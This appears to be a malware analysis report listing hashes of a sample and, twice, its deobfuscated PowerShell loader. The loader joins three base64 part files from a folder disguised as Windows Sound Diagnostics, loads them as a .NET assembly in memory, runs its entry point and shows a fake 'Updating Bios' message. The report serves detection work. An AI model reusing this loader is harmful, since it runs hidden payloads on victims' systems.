|
Hash | Hash Value |
|---|---|
| MD5 | 2b04f5e11f985670bb5bf4d87409aebd
|
| Sha1 | d7a82babebe7c46a736e8fd337bd49ac570eb553
|
| Sha256 | d3ef9f47ab20192f4f1acb7098a4481f2faca5778e3e31e8aa61414af87328d7
|
| Sha384 | 117c01ff202f0d3684def8fa9eccd310d73691db36aa07faef71eb7664ae00524a6720c8d57beb119f6daffb621a7d63
|
| Sha512 | 914cbe829a6486072be87cd1d5725c95068b2115504869c93357e1d2951c4e0d93c4051a7b35d51ecc5fb1b7ee5c32b14d080e2a46f6441093b45197c68641b7
|
| SSDeep | 12:MABu0bJ64iaucuxyGAH2TSlqxd3pj//pnZY8VjSsKQRDOW5T0uiyhhv:u0bwt5c5GC2dTx3pni8EsKEyW5Diyb
|
| TLSH | E551DD0E5517469D27F216BABD112C08E80C461FC15D2865B88C53C01F2A5644823EDC
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $dir = "$env:LOCALAPPDATA\Packages\Microsoft.WindowsSoundDiagnostics\Cache" $base64 = (1 .. 3 | ForEach-Object Get-Content "$dir\part$_.txt" -Raw) -join "" $bytes = [Convert]::"FromBase64String"($base64) $asm = [Assembly]::"Load"($bytes) $ep = $asm."EntryPoint" if ($ep) { Write-Host "Updating Bios:" $ep."DeclaringType"."FullName" "::" $ep."Name" if ($ep."GetParameters"()."Count" -eq 0) { $ep."Invoke"($null, @({ } )) } else { $ep."Invoke"($null, @({ [string[]] @({ } ) } )) } } else { Write-Host "No entry point found." } |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $dir = "$env:LOCALAPPDATA\Packages\Microsoft.WindowsSoundDiagnostics\Cache" $base64 = (1 .. 3 | ForEach-Object Get-Content "$dir\part$_.txt" -Raw) -join "" $bytes = [Convert]::"FromBase64String"($base64) $asm = [Assembly]::"Load"($bytes) $ep = $asm."EntryPoint" if ($ep) { Write-Host "Updating Bios:" $ep."DeclaringType"."FullName" "::" $ep."Name" if ($ep."GetParameters"()."Count" -eq 0) { $ep."Invoke"($null, @({ } )) } else { $ep."Invoke"($null, @({ [string[]] @({ } ) } )) } } else { Write-Host "No entry point found." } Malicious |
Part3.Resolution |